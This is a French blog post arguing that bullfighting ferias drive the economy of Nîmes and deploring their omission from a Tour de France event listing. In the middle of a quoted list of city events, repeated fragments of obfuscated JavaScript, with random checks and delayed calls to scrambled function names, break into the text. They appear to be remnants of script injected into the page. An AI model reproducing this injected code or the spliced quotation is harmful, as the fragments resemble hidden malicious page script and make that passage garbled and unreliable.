FRILOSITE

En 2014, en deux ferias (Pentecôte et Vendanges) les arènes de Nîmes auront accueilli plus de 110 000 spectateurs payants, 70 000 à la Pentecôte – 40 000 aux Vendanges, qui engendrent des retombées économiques majeures. Selon une étude réalisée tout récemment par la CCI de Nîmes, la dernière feria de Pentecôte a apportée plus de 50 millions d’euros à l’économie nîmoise.

Quel autre évènement entraine autant de retombées sur la ville ? Ne cherchez pas, il n’y en a pas d’autres.

De plus, Nîmes sera probablement en août 2017, ville départ du Tour d’Espane. Pendant cinq jours, plus d’un millier de personnes (membres de l’organisation, coureurs, staff, journalistes, suiveurs, caravane publicitaire etc…) doperont l’économie de la ville. Cet évènement sportif est la suite logique d’un autre évènement. En effet, Javier Guillen (directeur de la Vuelta) a découvert Nîmes lors du solo de José Tomàs en septembre 2012. Ainsi est née l’idée d’un départ de Nîmes.

L’économie nîmoise est donc très étroitement liée à la tauromachie.

Pourtant, sur le site du tour de France, on pouvait lire au chapitre animations et culture : « …Festivals de flamenco, B.D., grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ands jeux romains, nuits des jardins, jeudis de Nîmes, féerie des eaux." Pas la moindre trace de feria. Le service communication de la ville de Nîmes qui a fourni ces élèments au tour de France a occulté les ferias.

Doit-on avoir honte de mettre en avant la tauromachie ?

Cette frilosité est ridicule !

Les commentaires sont fermés.